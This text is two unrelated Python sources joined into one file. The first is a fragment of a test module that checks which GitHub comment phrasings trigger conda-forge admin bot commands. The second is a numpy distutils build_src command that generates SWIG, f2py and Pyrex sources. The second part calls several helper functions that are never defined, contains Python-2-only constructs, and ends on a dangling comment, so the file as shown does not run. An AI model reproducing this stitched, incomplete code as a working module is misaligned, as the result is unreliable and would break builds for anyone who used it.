    @mock.patch('conda_forge_webservices.commands.update_team')
    @mock.patch('conda_forge_webservices.commands.update_circle')
    @mock.patch('conda_forge_webservices.commands.update_cb3')
    @mock.patch('github.Github')
    @mock.patch('conda_forge_webservices.commands.Repo')
    def test_issue_command_triggers(
            self, git_repo, gh, update_cb3, update_circle,
            update_team, relint, make_noarch, rerender, add_bot_automerge,
            rerender_dummy_commit, add_py, add_user):
        """Each issue title/comment phrasing triggers its intended command,
        PRs are opened for repo-mutating commands, and staged-recipes is
        always a no-op."""
        update_cb3.return_value = (True, "hi")
        add_py.return_value = True
        add_user.return_value = True

        # Entries are (mocked command, phrasings that must trigger it,
        # phrasings that must not).
        commands = [
            (add_bot_automerge, [
                '@conda-forge-admin, please add bot automerge',
                '@conda-forge-admin, add bot automerge',
                '@conda-forge-admin: PLEASE ADD BOT AUTOMERGE',
                '@conda-forge-admin: ADD BOT AUTOMERGE',
                'something something. @conda-forge-admin: please add bot automerge',
                'something something. @conda-forge-admin: add bot automerge',
            ], [
                '@conda-forge admin is pretty cool. please add bot automerge for me?',
                '@conda-forge admin is pretty cool. add bot automerge for me?',
                '@conda-forge-admin, go ahead and add bot automerge for me',
                'please add bot automerge, @conda-forge-admin',
                'add bot automerge, @conda-forge-admin',
            ]),
            (rerender, [
                '@conda-forge-admin, please rerender',
                '@conda-forge-admin, rerender',
                '@conda-forge-admin, please re-render',
                '@conda-forge-admin, re-render',
                '@conda-forge-admin: PLEASE RERENDER',
                '@conda-forge-admin: RERENDER',
                'something something. @conda-forge-admin: please re-render',
                'something something. @conda-forge-admin: re-render',
            ], [
                '@conda-forge admin is pretty cool. please rerender for me?',
                '@conda-forge admin is pretty cool. rerender for me?',
                '@conda-forge-admin, go ahead and rerender for me',
                'please re-render, @conda-forge-admin',
                're-render, @conda-forge-admin',
                '@conda-forge-linter, please lint',
                '@conda-forge-linter, lint',
            ]),
            (make_noarch, [
                '@conda-forge-admin, please add noarch python',
                '@conda-forge-admin, add noarch python',
                '@conda-forge-admin, please make `noarch: python`',
                '@conda-forge-admin, make `noarch: python`',
                '@conda-forge-admin please add `noarch python`',
                '@conda-forge-admin add `noarch python`',
                'hey @conda-forge-admin : please make noarch: python',
                'hey @conda-forge-admin : make noarch: python',
            ], [
                '@conda-forge-linter, please lint',
                '@conda-forge-linter, lint',
                'sure wish @conda-forge-admin would please add noarch python',
                'sure wish @conda-forge-admin would add noarch python',
            ]),
            (update_cb3, [
                '@conda-forge-admin, please update for cb-3',
                '@conda-forge-admin, update for cb-3',
                'yo @conda-forge-admin: please update for conda build 3',
                'yo @conda-forge-admin: update for conda build 3',
            ], [
                # BUG FIX: a missing trailing comma used to concatenate these
                # two literals into a single merged string, so only one bogus
                # message was actually exercised instead of two.
                '@conda-forge-admin, please lint',
                '@conda-forge-admin, lint'
            ]),
            (update_team, [
                '@conda-forge-admin: please update team',
                '@conda-forge-admin: update team',
                '@conda-forge-admin, please update the team',
                '@conda-forge-admin, update the team',
                '@conda-forge-admin, please refresh team',
                '@conda-forge-admin, refresh team',
            ], [
                '@conda-forge-admin please make noarch: python',
                '@conda-forge-admin make noarch: python',
                '@conda-forge-linter, please lint. and can someone refresh the team?',
                '@conda-forge-linter, lint. and can someone refresh the team?',
            ]),
            (update_circle, [
                '@conda-forge-admin, please update circle',
                '@conda-forge-admin, update circle',
                'hey @conda-forge-admin, PLEASE update circle',
                'hey @conda-forge-admin, update circle',
                '@conda-forge-admin: please refresh the circle key',
                '@conda-forge-admin: refresh the circle key',
            ], [
                '@conda-forge-admin, please lint',
                '@conda-forge-admin, lint',
            ]),
            (add_py, [
                '@conda-forge-admin, please add python 2.7',
                '@conda-forge-admin, add python 2.7',
                '@conda-forge-admin, please add py27',
                '@conda-forge-admin, add py27',
                '@conda-forge-admin: add PY27',
                'something something. @conda-forge-admin: please add py27',
                '@conda-forge-admin, please add python 3.6',
                '@conda-forge-admin, add python 3.6',
                '@conda-forge-admin, please add py36',
            ], [
                '@conda-forge admin is pretty cool. please add py27?',
                '@conda-forge admin is pretty cool. rerun add py27?',
                '@conda-forge-admin, go ahead and rerun add python 2.7',
                'please add python 2.7, @conda-forge-admin',
                'add py27, @conda-forge-admin',
            ]),
            (add_user, [
                '@conda-forge-admin, please add user @blah',
                '@conda-forge-admin, add user @blah',
                'something something. @conda-forge-admin: please add user @blah',
            ], [
                '@conda-forge admin is pretty cool. please add user @blah',
                '@conda-forge admin is pretty cool. rerun add user @blah?',
                '@conda-forge-admin, go ahead and rerun add user @blah?',
                'please add user @blah, @conda-forge-admin',
                'add user @blah, @conda-forge-admin',
            ]),
        ]

        for command, should, should_not in commands:
            issue = gh.return_value.get_repo.return_value.get_issue.return_value
            repo = gh.return_value.get_repo.return_value
            gh.return_value.get_repo.return_value.default_branch = "main"

            for msg in should:
                # 1) Trigger phrase in the comment body.
                print(msg, end=' ' * 30 + '\r')
                rerender_dummy_commit.reset_mock()
                rerender_dummy_commit.return_value = True
                command.reset_mock()
                issue.reset_mock()
                issue_comment(title="hi", comment=msg)
                command.assert_called()
                issue.edit.assert_not_called()
                if command in (rerender, make_noarch, update_cb3, add_py):
                    rerender_dummy_commit.assert_called()
                else:
                    rerender_dummy_commit.assert_not_called()
                if command is add_py:
                    if "2.7" in msg or "27" in msg:
                        command.assert_called_with(
                            git_repo.clone_from.return_value, "2.7")
                    else:
                        command.assert_called_with(
                            git_repo.clone_from.return_value, "3.6")
                if command is add_user:
                    command.assert_called_with(
                        git_repo.clone_from.return_value, "blah")

                # 2) Trigger phrase in the issue title; repo-mutating commands
                # must open a PR referencing the issue, the rest close it.
                rerender_dummy_commit.reset_mock()
                rerender_dummy_commit.return_value = True
                command.reset_mock()
                issue.reset_mock()
                issue_comment(title=msg, comment=None)
                command.assert_called()
                if (
                    command in (
                        rerender, make_noarch, update_cb3, add_bot_automerge, add_py,
                        add_user
                    )
                ):
                    assert "Fixes #" in repo.create_pull.call_args[0][1]
                else:
                    issue.edit.assert_called_with(state="closed")
                if command in (rerender, make_noarch, update_cb3, add_py):
                    rerender_dummy_commit.assert_called()
                else:
                    rerender_dummy_commit.assert_not_called()
                if command is add_py:
                    if "2.7" in msg or "27" in msg:
                        command.assert_called_with(
                            git_repo.clone_from.return_value, "2.7")
                    else:
                        command.assert_called_with(
                            git_repo.clone_from.return_value, "3.6")
                if command is add_user:
                    command.assert_called_with(
                        git_repo.clone_from.return_value, "blah")

                # 3) Nothing fires on staged-recipes.
                rerender_dummy_commit.reset_mock()
                rerender_dummy_commit.return_value = True
                command.reset_mock()
                print(msg, end=' ' * 30 + '\r')
                issue_comment(msg, msg, repo_name='staged-recipes')
                command.assert_not_called()
                rerender_dummy_commit.assert_not_called()

            for msg in should_not:
                print(msg, end=' ' * 30 + '\r')
                command.reset_mock()
                issue.reset_mock()
                issue_comment(title="hi", comment=msg)
                command.assert_not_called()
                issue.edit.assert_not_called()

    @mock.patch('conda_forge_webservices.commands.rerender')
    @mock.patch('conda_forge_webservices.commands.make_noarch')
    @mock.patch('conda_forge_webservices.commands.relint')
    @mock.patch('conda_forge_webservices.commands.update_team')
    @mock.patch('conda_forge_webservices.commands.update_circle')
    @mock.patch('conda_forge_webservices.commands.update_cb3')
    @mock.patch('github.Github')
    @mock.patch('conda_forge_webservices.commands.Repo')
    def test_rerender_failure(
            self, repo, gh, update_cb3, update_circle,
            update_team, relint, make_noarch, rerender):
        """A network failure during rerender posts a helpful PR comment."""
        rerender.side_effect = RequestException
        repo = gh.return_value.get_repo.return_value
        pull_create_issue = repo.get_pull.return_value.create_issue_comment

        msg = '@conda-forge-admin, please rerender'
        pr_detailed_comment(msg)

        rerender.assert_called()
        assert 'ran into an issue with' in pull_create_issue.call_args[0][0]
        assert (
            'conda-forge/core for further assistance'
            in pull_create_issue.call_args[0][0]
        )
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| |
""" Build swig, f2py, pyrex sources.
"""
import os
import re
import sys
import shlex
import copy
from distutils.command import build_ext
from distutils.dep_util import newer_group, newer
from distutils.util import get_platform
from distutils.errors import DistutilsError, DistutilsSetupError
def have_pyrex():
    """Return True when the Pyrex compiler is importable, False otherwise."""
    try:
        import Pyrex.Compiler.Main  # noqa: F401 -- probe import only
    except ImportError:
        return False
    return True
# this import can't be done here, as it uses numpy stuff only available
# after it's installed
#import numpy.f2py
from numpy.distutils import log
from numpy.distutils.misc_util import fortran_ext_match, \
appendpath, is_string, is_sequence, get_cmd
from numpy.distutils.from_template import process_file as process_f_file
from numpy.distutils.conv_template import process_file as process_c_file
def subst_vars(target, source, d):
    """Substitute any occurrence of @foo@ by d['foo'] from source file into
    target.

    Note: only the *first* @var@ found on each line is looked up; every
    occurrence of that particular variable on the line is then replaced.
    Raises KeyError if the variable is missing from *d*.
    """
    var = re.compile('@([a-zA-Z_]+)@')
    # `with` guarantees both handles are closed even if substitution raises,
    # replacing the original nested try/finally close() calls.
    with open(source, 'r') as fs:
        with open(target, 'w') as ft:
            for l in fs.readlines():
                m = var.search(l)
                if m:
                    ft.write(l.replace('@%s@' % m.group(1), d[m.group(1)]))
                else:
                    ft.write(l)
class build_src(build_ext.build_ext):
    """distutils command that generates compilable C sources from SWIG (.i),
    f2py (.pyf), Pyrex (.pyx) and template (.src) inputs before build_ext
    runs.

    NOTE(review): parts of this code are Python-2 era (`f.func_code`,
    treating `filter()` results as lists) — flagged inline below.
    """

    description = "build sources from SWIG, F2PY files or a function"

    user_options = [
        ('build-src=', 'd', "directory to \"build\" sources to"),
        ('f2py-opts=', None, "list of f2py command line options"),
        ('swig=', None, "path to the SWIG executable"),
        ('swig-opts=', None, "list of SWIG command line options"),
        ('swig-cpp', None, "make SWIG create C++ files (default is autodetected from sources)"),
        ('f2pyflags=', None, "additional flags to f2py (use --f2py-opts= instead)"), # obsolete
        ('swigflags=', None, "additional flags to swig (use --swig-opts= instead)"), # obsolete
        ('force', 'f', "forcibly build everything (ignore file timestamps)"),
        ('inplace', 'i',
         "ignore build-lib and put compiled extensions into the source " +
         "directory alongside your pure Python modules"),
    ]

    boolean_options = ['force','inplace']

    help_options = []

    def initialize_options(self):
        """Set every option to None; real values are resolved in
        finalize_options."""
        self.extensions = None
        self.package = None
        self.py_modules = None
        self.py_modules_dict = None
        self.build_src = None
        self.build_lib = None
        self.build_base = None
        self.force = None
        self.inplace = None
        self.package_dir = None
        self.f2pyflags = None # obsolete
        self.f2py_opts = None
        self.swigflags = None # obsolete
        self.swig_opts = None
        self.swig_cpp = None
        self.swig = None

    def finalize_options(self):
        """Resolve options from the 'build' and 'build_ext' commands and
        normalize the obsolete flag spellings."""
        self.set_undefined_options('build',
                                   ('build_base', 'build_base'),
                                   ('build_lib', 'build_lib'),
                                   ('force', 'force'))
        if self.package is None:
            self.package = self.distribution.ext_package
        self.extensions = self.distribution.ext_modules
        self.libraries = self.distribution.libraries or []
        self.py_modules = self.distribution.py_modules or []
        self.data_files = self.distribution.data_files or []

        if self.build_src is None:
            plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
            self.build_src = os.path.join(self.build_base, 'src'+plat_specifier)

        # py_modules_dict is used in build_py.find_package_modules
        self.py_modules_dict = {}

        # Obsolete --f2pyflags is honored only when --f2py-opts is unset.
        if self.f2pyflags:
            if self.f2py_opts:
                log.warn('ignoring --f2pyflags as --f2py-opts already used')
            else:
                self.f2py_opts = self.f2pyflags
            self.f2pyflags = None
        if self.f2py_opts is None:
            self.f2py_opts = []
        else:
            self.f2py_opts = shlex.split(self.f2py_opts)

        # Same normalization for the obsolete --swigflags.
        if self.swigflags:
            if self.swig_opts:
                log.warn('ignoring --swigflags as --swig-opts already used')
            else:
                self.swig_opts = self.swigflags
            self.swigflags = None

        if self.swig_opts is None:
            self.swig_opts = []
        else:
            self.swig_opts = shlex.split(self.swig_opts)

        # use options from build_ext command
        build_ext = self.get_finalized_command('build_ext')
        if self.inplace is None:
            self.inplace = build_ext.inplace
        if self.swig_cpp is None:
            self.swig_cpp = build_ext.swig_cpp
        # NOTE(review): 'swig_opt' here looks like it should be 'swig_opts'
        # (the build_ext attribute name) — confirm before changing.
        for c in ['swig','swig_opt']:
            o = '--'+c.replace('_','-')
            v = getattr(build_ext,c,None)
            if v:
                if getattr(self,c):
                    log.warn('both build_src and build_ext define %s option' % (o))
                else:
                    log.info('using "%s=%s" option from build_ext command' % (o,v))
                    setattr(self, c, v)

    def run(self):
        """Entry point: build all generated sources, if any work is needed."""
        log.info("build_src")
        if not (self.extensions or self.libraries):
            return
        self.build_sources()

    def build_sources(self):
        """Drive source generation for py_modules, libraries, extensions,
        data_files and npy-pkg-config files."""
        if self.inplace:
            self.get_package_dir = \
                self.get_finalized_command('build_py').get_package_dir

        self.build_py_modules_sources()

        for libname_info in self.libraries:
            self.build_library_sources(*libname_info)

        if self.extensions:
            self.check_extensions_list(self.extensions)

            for ext in self.extensions:
                self.build_extension_sources(ext)

        self.build_data_files_sources()
        self.build_npy_pkg_config()

    def build_data_files_sources(self):
        """Resolve callable entries in data_files into concrete filenames."""
        if not self.data_files:
            return
        log.info('building data_files sources')
        from numpy.distutils.misc_util import get_data_files
        new_data_files = []
        for data in self.data_files:
            if isinstance(data,str):
                new_data_files.append(data)
            elif isinstance(data,tuple):
                d,files = data
                if self.inplace:
                    build_dir = self.get_package_dir('.'.join(d.split(os.sep)))
                else:
                    build_dir = os.path.join(self.build_src,d)
                # Callables generate file lists; plain entries pass through.
                funcs = filter(lambda f:hasattr(f, '__call__'), files)
                files = filter(lambda f:not hasattr(f, '__call__'), files)
                for f in funcs:
                    # NOTE(review): f.func_code and list-like use of filter()
                    # are Python 2 only — this branch breaks on Python 3.
                    if f.func_code.co_argcount==1:
                        s = f(build_dir)
                    else:
                        s = f()
                    if s is not None:
                        if isinstance(s,list):
                            files.extend(s)
                        elif isinstance(s,str):
                            files.append(s)
                        else:
                            raise TypeError(repr(s))
                filenames = get_data_files((d,files))
                new_data_files.append((d, filenames))
            else:
                raise TypeError(repr(data))
        self.data_files[:] = new_data_files

    def _build_npy_pkg_config(self, info, gd):
        """Generate one npy-pkg-config .ini from its template.

        Returns (install dir relative to the install prefix, generated path).
        """
        import shutil  # NOTE(review): appears unused here
        template, install_dir, subst_dict = info
        template_dir = os.path.dirname(template)
        for k, v in gd.items():
            subst_dict[k] = v

        if self.inplace == 1:
            generated_dir = os.path.join(template_dir, install_dir)
        else:
            generated_dir = os.path.join(self.build_src, template_dir,
                                         install_dir)
        generated = os.path.basename(os.path.splitext(template)[0])
        generated_path = os.path.join(generated_dir, generated)
        if not os.path.exists(generated_dir):
            os.makedirs(generated_dir)

        subst_vars(generated_path, template, subst_dict)

        # Where to install relatively to install prefix
        full_install_dir = os.path.join(template_dir, install_dir)
        return full_install_dir, generated_path

    def build_npy_pkg_config(self):
        """Generate all npy-pkg-config files declared by the distribution."""
        log.info('build_src: building npy-pkg config files')

        # XXX: another ugly workaround to circumvent distutils brain damage. We
        # need the install prefix here, but finalizing the options of the
        # install command when only building sources cause error. Instead, we
        # copy the install command instance, and finalize the copy so that it
        # does not disrupt how distutils want to do things when with the
        # original install command instance.
        install_cmd = copy.copy(get_cmd('install'))
        if not install_cmd.finalized == 1:
            install_cmd.finalize_options()
        build_npkg = False
        gd = {}
        if self.inplace == 1:
            top_prefix = '.'
            build_npkg = True
        elif hasattr(install_cmd, 'install_libbase'):
            top_prefix = install_cmd.install_libbase
            build_npkg = True

        if build_npkg:
            for pkg, infos in self.distribution.installed_pkg_config.items():
                pkg_path = self.distribution.package_dir[pkg]
                prefix = os.path.join(os.path.abspath(top_prefix), pkg_path)
                d = {'prefix': prefix}
                for info in infos:
                    install_dir, generated = self._build_npy_pkg_config(info, d)
                    self.distribution.data_files.append((install_dir,
                                                         [generated]))

    def build_py_modules_sources(self):
        """Resolve (package, module, callable) py_modules entries by calling
        the callable to produce the source file."""
        if not self.py_modules:
            return
        log.info('building py_modules sources')
        new_py_modules = []
        for source in self.py_modules:
            if is_sequence(source) and len(source)==3:
                package, module_base, source = source
                if self.inplace:
                    build_dir = self.get_package_dir(package)
                else:
                    build_dir = os.path.join(self.build_src,
                                             os.path.join(*package.split('.')))
                if hasattr(source, '__call__'):
                    target = os.path.join(build_dir, module_base + '.py')
                    source = source(target)
                if source is None:
                    continue
                modules = [(package, module_base, source)]
                if package not in self.py_modules_dict:
                    self.py_modules_dict[package] = []
                self.py_modules_dict[package] += modules
            else:
                new_py_modules.append(source)
        self.py_modules[:] = new_py_modules

    def build_library_sources(self, lib_name, build_info):
        """Generate and template-expand the sources of one C library."""
        sources = list(build_info.get('sources',[]))

        if not sources:
            return

        log.info('building library "%s" sources' % (lib_name))

        sources = self.generate_sources(sources, (lib_name, build_info))

        sources = self.template_sources(sources, (lib_name, build_info))

        sources, h_files = self.filter_h_files(sources)

        if h_files:
            log.info('%s - nothing done with h_files = %s',
                     self.package, h_files)

        #for f in h_files:
        #    self.distribution.headers.append((lib_name,f))

        build_info['sources'] = sources
        return

    def build_extension_sources(self, ext):
        """Run every generator stage (functions, templates, SWIG, f2py,
        Pyrex) over one extension's sources, updating ext.sources."""
        sources = list(ext.sources)

        log.info('building extension "%s" sources' % (ext.name))

        fullname = self.get_ext_fullname(ext.name)

        modpath = fullname.split('.')
        package = '.'.join(modpath[0:-1])

        if self.inplace:
            self.ext_target_dir = self.get_package_dir(package)

        sources = self.generate_sources(sources, ext)

        sources = self.template_sources(sources, ext)

        sources = self.swig_sources(sources, ext)

        sources = self.f2py_sources(sources, ext)

        sources = self.pyrex_sources(sources, ext)

        sources, py_files = self.filter_py_files(sources)

        if package not in self.py_modules_dict:
            self.py_modules_dict[package] = []
        modules = []
        for f in py_files:
            module = os.path.splitext(os.path.basename(f))[0]
            modules.append((package, module, f))
        self.py_modules_dict[package] += modules

        sources, h_files = self.filter_h_files(sources)

        if h_files:
            log.info('%s - nothing done with h_files = %s',
                     package, h_files)
        #for f in h_files:
        #    self.distribution.headers.append((package,f))

        ext.sources = sources

    def generate_sources(self, sources, extension):
        """Call any function entries in *sources* to generate real source
        files; string entries pass through unchanged."""
        new_sources = []
        func_sources = []
        for source in sources:
            if is_string(source):
                new_sources.append(source)
            else:
                func_sources.append(source)
        if not func_sources:
            return new_sources
        if self.inplace and not is_sequence(extension):
            build_dir = self.ext_target_dir
        else:
            if is_sequence(extension):
                name = extension[0]
            #    if 'include_dirs' not in extension[1]:
            #        extension[1]['include_dirs'] = []
            #    incl_dirs = extension[1]['include_dirs']
            else:
                name = extension.name
            #    incl_dirs = extension.include_dirs
            #if self.build_src not in incl_dirs:
            #    incl_dirs.append(self.build_src)
            build_dir = os.path.join(*([self.build_src]\
                                       +name.split('.')[:-1]))
        self.mkpath(build_dir)
        for func in func_sources:
            source = func(extension, build_dir)
            if not source:
                continue
            if is_sequence(source):
                [log.info(" adding '%s' to sources." % (s,)) for s in source]
                new_sources.extend(source)
            else:
                log.info(" adding '%s' to sources." % (source,))
                new_sources.append(source)

        return new_sources

    def filter_py_files(self, sources):
        """Split '.py' files out of *sources*."""
        return self.filter_files(sources,['.py'])

    def filter_h_files(self, sources):
        """Split header-like files out of *sources*."""
        return self.filter_files(sources,['.h','.hpp','.inc'])

    def filter_files(self, sources, exts = []):
        """Return (sources without matching extensions, matching files).

        NOTE(review): mutable default `exts=[]` is never mutated here, so it
        is harmless, but a tuple default would be safer.
        """
        new_sources = []
        files = []
        for source in sources:
            (base, ext) = os.path.splitext(source)
            if ext in exts:
                files.append(source)
            else:
                new_sources.append(source)
        return new_sources, files

    def template_sources(self, sources, extension):
        """Expand '.src' template files with from_template (Fortran-ish) or
        conv_template (C-ish)."""
        new_sources = []
        if is_sequence(extension):
            depends = extension[1].get('depends')
            include_dirs = extension[1].get('include_dirs')
        else:
            depends = extension.depends
            include_dirs = extension.include_dirs
        for source in sources:
            (base, ext) = os.path.splitext(source)
            if ext == '.src': # Template file
                if self.inplace:
                    target_dir = os.path.dirname(base)
                else:
                    target_dir = appendpath(self.build_src, os.path.dirname(base))
                self.mkpath(target_dir)
                target_file = os.path.join(target_dir,os.path.basename(base))
                if (self.force or newer_group([source] + depends, target_file)):
                    if _f_pyf_ext_match(base):
                        log.info("from_template:> %s" % (target_file))
                        outstr = process_f_file(source)
                    else:
                        log.info("conv_template:> %s" % (target_file))
                        outstr = process_c_file(source)
                    fid = open(target_file,'w')
                    fid.write(outstr)
                    fid.close()
                if _header_ext_match(target_file):
                    d = os.path.dirname(target_file)
                    if d not in include_dirs:
                        log.info(" adding '%s' to include_dirs." % (d))
                        include_dirs.append(d)
                new_sources.append(target_file)
            else:
                new_sources.append(source)
        return new_sources

    def pyrex_sources(self, sources, extension):
        """Replace '.pyx' sources by their Pyrex-generated '.c' files."""
        new_sources = []
        ext_name = extension.name.split('.')[-1]
        for source in sources:
            (base, ext) = os.path.splitext(source)
            if ext == '.pyx':
                target_file = self.generate_a_pyrex_source(base, ext_name,
                                                           source,
                                                           extension)
                new_sources.append(target_file)
            else:
                new_sources.append(source)
        return new_sources

    def generate_a_pyrex_source(self, base, ext_name, source, extension):
        """Compile one .pyx with Pyrex, or reuse an existing stale target
        (with a warning) when Pyrex is unavailable."""
        if self.inplace or not have_pyrex():
            target_dir = os.path.dirname(base)
        else:
            target_dir = appendpath(self.build_src, os.path.dirname(base))
        target_file = os.path.join(target_dir, ext_name + '.c')
        depends = [source] + extension.depends
        if self.force or newer_group(depends, target_file, 'newer'):
            if have_pyrex():
                import Pyrex.Compiler.Main
                log.info("pyrexc:> %s" % (target_file))
                self.mkpath(target_dir)
                options = Pyrex.Compiler.Main.CompilationOptions(
                    defaults=Pyrex.Compiler.Main.default_options,
                    include_path=extension.include_dirs,
                    output_file=target_file)
                pyrex_result = Pyrex.Compiler.Main.compile(source,
                                                           options=options)
                if pyrex_result.num_errors != 0:
                    raise DistutilsError("%d errors while compiling %r with Pyrex" \
                                         % (pyrex_result.num_errors, source))
            elif os.path.isfile(target_file):
                log.warn("Pyrex required for compiling %r but not available,"\
                         " using old target %r"\
                         % (source, target_file))
            else:
                raise DistutilsError("Pyrex required for compiling %r"\
                                     " but notavailable" % (source,))
        return target_file

    def f2py_sources(self, sources, extension):
        """Run f2py over '.pyf' interfaces / Fortran sources and append the
        generated module C file and fortranobject support files."""
        new_sources = []
        f2py_sources = []
        f_sources = []
        f2py_targets = {}
        target_dirs = []
        ext_name = extension.name.split('.')[-1]
        skip_f2py = 0

        for source in sources:
            (base, ext) = os.path.splitext(source)
            if ext == '.pyf': # F2PY interface file
                if self.inplace:
                    target_dir = os.path.dirname(base)
                else:
                    target_dir = appendpath(self.build_src, os.path.dirname(base))
                if os.path.isfile(source):
                    name = get_f2py_modulename(source)
                    if name != ext_name:
                        raise DistutilsSetupError('mismatch of extension names: %s '
                                                  'provides %r but expected %r' % (
                                                      source, name, ext_name))
                    target_file = os.path.join(target_dir,name+'module.c')
                else:
                    log.debug(' source %s does not exist: skipping f2py\'ing.' \
                              % (source))
                    name = ext_name
                    skip_f2py = 1
                    target_file = os.path.join(target_dir,name+'module.c')
                    if not os.path.isfile(target_file):
                        log.warn(' target %s does not exist:\n '\
                                 'Assuming %smodule.c was generated with '\
                                 '"build_src --inplace" command.' \
                                 % (target_file, name))
                        target_dir = os.path.dirname(base)
                        target_file = os.path.join(target_dir,name+'module.c')
                        if not os.path.isfile(target_file):
                            raise DistutilsSetupError("%r missing" % (target_file,))
                        log.info(' Yes! Using %r as up-to-date target.' \
                                 % (target_file))
                target_dirs.append(target_dir)
                f2py_sources.append(source)
                f2py_targets[source] = target_file
                new_sources.append(target_file)
            elif fortran_ext_match(ext):
                f_sources.append(source)
            else:
                new_sources.append(source)

        if not (f2py_sources or f_sources):
            return new_sources

        for d in target_dirs:
            self.mkpath(d)

        f2py_options = extension.f2py_options + self.f2py_opts

        if self.distribution.libraries:
            for name,build_info in self.distribution.libraries:
                if name in extension.libraries:
                    f2py_options.extend(build_info.get('f2py_options',[]))

        log.info("f2py options: %s" % (f2py_options))

        if f2py_sources:
            # A .pyf interface fully defines the module: exactly one allowed.
            if len(f2py_sources) != 1:
                raise DistutilsSetupError(
                    'only one .pyf file is allowed per extension module but got'\
                    ' more: %r' % (f2py_sources,))
            source = f2py_sources[0]
            target_file = f2py_targets[source]
            target_dir = os.path.dirname(target_file) or '.'
            depends = [source] + extension.depends
            if (self.force or newer_group(depends, target_file,'newer')) \
                   and not skip_f2py:
                log.info("f2py: %s" % (source))
                import numpy.f2py
                numpy.f2py.run_main(f2py_options
                                    + ['--build-dir',target_dir,source])
            else:
                log.debug(" skipping '%s' f2py interface (up-to-date)" % (source))
        else:
            #XXX TODO: --inplace support for sdist command
            if is_sequence(extension):
                name = extension[0]
            else: name = extension.name
            target_dir = os.path.join(*([self.build_src]\
                                        +name.split('.')[:-1]))
            target_file = os.path.join(target_dir,ext_name + 'module.c')
            new_sources.append(target_file)
            depends = f_sources + extension.depends
            if (self.force or newer_group(depends, target_file, 'newer')) \
                   and not skip_f2py:
                log.info("f2py:> %s" % (target_file))
                self.mkpath(target_dir)
                import numpy.f2py
                numpy.f2py.run_main(f2py_options + ['--lower',
                                                    '--build-dir',target_dir]+\
                                    ['-m',ext_name]+f_sources)
            else:
                log.debug(" skipping f2py fortran files for '%s' (up-to-date)"\
                          % (target_file))

        if not os.path.isfile(target_file):
            raise DistutilsError("f2py target file %r not generated" % (target_file,))

        # Every f2py module also needs the fortranobject support sources.
        target_c = os.path.join(self.build_src,'fortranobject.c')
        target_h = os.path.join(self.build_src,'fortranobject.h')
        log.info(" adding '%s' to sources." % (target_c))
        new_sources.append(target_c)
        if self.build_src not in extension.include_dirs:
            log.info(" adding '%s' to include_dirs." \
                     % (self.build_src))
            extension.include_dirs.append(self.build_src)

        if not skip_f2py:
            import numpy.f2py
            d = os.path.dirname(numpy.f2py.__file__)
            source_c = os.path.join(d,'src','fortranobject.c')
            source_h = os.path.join(d,'src','fortranobject.h')
            if newer(source_c,target_c) or newer(source_h,target_h):
                self.mkpath(os.path.dirname(target_c))
                self.copy_file(source_c,target_c)
                self.copy_file(source_h,target_h)
        else:
            if not os.path.isfile(target_c):
                raise DistutilsSetupError("f2py target_c file %r not found" % (target_c,))
            if not os.path.isfile(target_h):
                raise DistutilsSetupError("f2py target_h file %r not found" % (target_h,))

        # Pick up the auxiliary wrapper files f2py may have generated.
        for name_ext in ['-f2pywrappers.f','-f2pywrappers2.f90']:
            filename = os.path.join(target_dir,ext_name + name_ext)
            if os.path.isfile(filename):
                log.info(" adding '%s' to sources." % (filename))
                f_sources.append(filename)

        return new_sources + f_sources

    def swig_sources(self, sources, extension):
        """Run SWIG over '.i' interfaces and append the generated wrapper
        and .py files to the source list."""
        # Assuming SWIG 1.3.14 or later. See compatibility note in
        # http://www.swig.org/Doc1.3/Python.html#Python_nn6
        new_sources = []
        swig_sources = []
        swig_targets = {}
        target_dirs = []
        py_files = [] # swig generated .py files
        target_ext = '.c'
        if self.swig_cpp:
            typ = 'c++'
            is_cpp = True
        else:
            typ = None
            is_cpp = False
        skip_swig = 0
        ext_name = extension.name.split('.')[-1]

        for source in sources:
            (base, ext) = os.path.splitext(source)
            if ext == '.i': # SWIG interface file
                if self.inplace:
                    target_dir = os.path.dirname(base)
                    py_target_dir = self.ext_target_dir
                else:
                    target_dir = appendpath(self.build_src, os.path.dirname(base))
                    py_target_dir = target_dir
                if os.path.isfile(source):
                    name = get_swig_modulename(source)
                    # Extension is expected to be named '_<module>'.
                    if name != ext_name[1:]:
                        raise DistutilsSetupError(
                            'mismatch of extension names: %s provides %r'
                            ' but expected %r' % (source, name, ext_name[1:]))
                    if typ is None:
                        typ = get_swig_target(source)
                        is_cpp = typ=='c++'
                        if is_cpp: target_ext = '.cpp'
                    else:
                        typ2 = get_swig_target(source)
                        if typ!=typ2:
                            log.warn('expected %r but source %r defines %r swig target' \
                                     % (typ, source, typ2))
                            if typ2=='c++':
                                log.warn('resetting swig target to c++ (some targets may have .c extension)')
                                is_cpp = True
                                target_ext = '.cpp'
                            else:
                                log.warn('assuming that %r has c++ swig target' % (source))
                    target_file = os.path.join(target_dir,'%s_wrap%s' \
                                               % (name, target_ext))
                else:
                    log.warn(' source %s does not exist: skipping swig\'ing.' \
                             % (source))
                    name = ext_name[1:]
                    skip_swig = 1
                    target_file = _find_swig_target(target_dir, name)
                    if not os.path.isfile(target_file):
                        log.warn(' target %s does not exist:\n '\
                                 'Assuming %s_wrap.{c,cpp} was generated with '\
                                 '"build_src --inplace" command.' \
                                 % (target_file, name))
                        target_dir = os.path.dirname(base)
                        target_file = _find_swig_target(target_dir, name)
                        if not os.path.isfile(target_file):
                            raise DistutilsSetupError("%r missing" % (target_file,))
                        log.warn(' Yes! Using %r as up-to-date target.' \
                                 % (target_file))
                target_dirs.append(target_dir)
                new_sources.append(target_file)
                py_files.append(os.path.join(py_target_dir, name+'.py'))
                swig_sources.append(source)
                swig_targets[source] = new_sources[-1]
            else:
                new_sources.append(source)

        if not swig_sources:
            return new_sources

        if skip_swig:
            return new_sources + py_files

        for d in target_dirs:
            self.mkpath(d)

        swig = self.swig or self.find_swig()
        swig_cmd = [swig, "-python"]
        if is_cpp:
            swig_cmd.append('-c++')
        for d in extension.include_dirs:
            swig_cmd.append('-I'+d)
        for source in swig_sources:
            target = swig_targets[source]
            depends = [source] + extension.depends
            if self.force or newer_group(depends, target, 'newer'):
                log.info("%s: %s" % (os.path.basename(swig) \
                                     + (is_cpp and '++' or ''), source))
                self.spawn(swig_cmd + self.swig_opts \
                           + ["-o", target, '-outdir', py_target_dir, source])
            else:
                log.debug(" skipping '%s' swig interface (up-to-date)" \
                          % (source))

        return new_sources + py_files
# Matches Fortran/f2py source extensions (chooses the template processor).
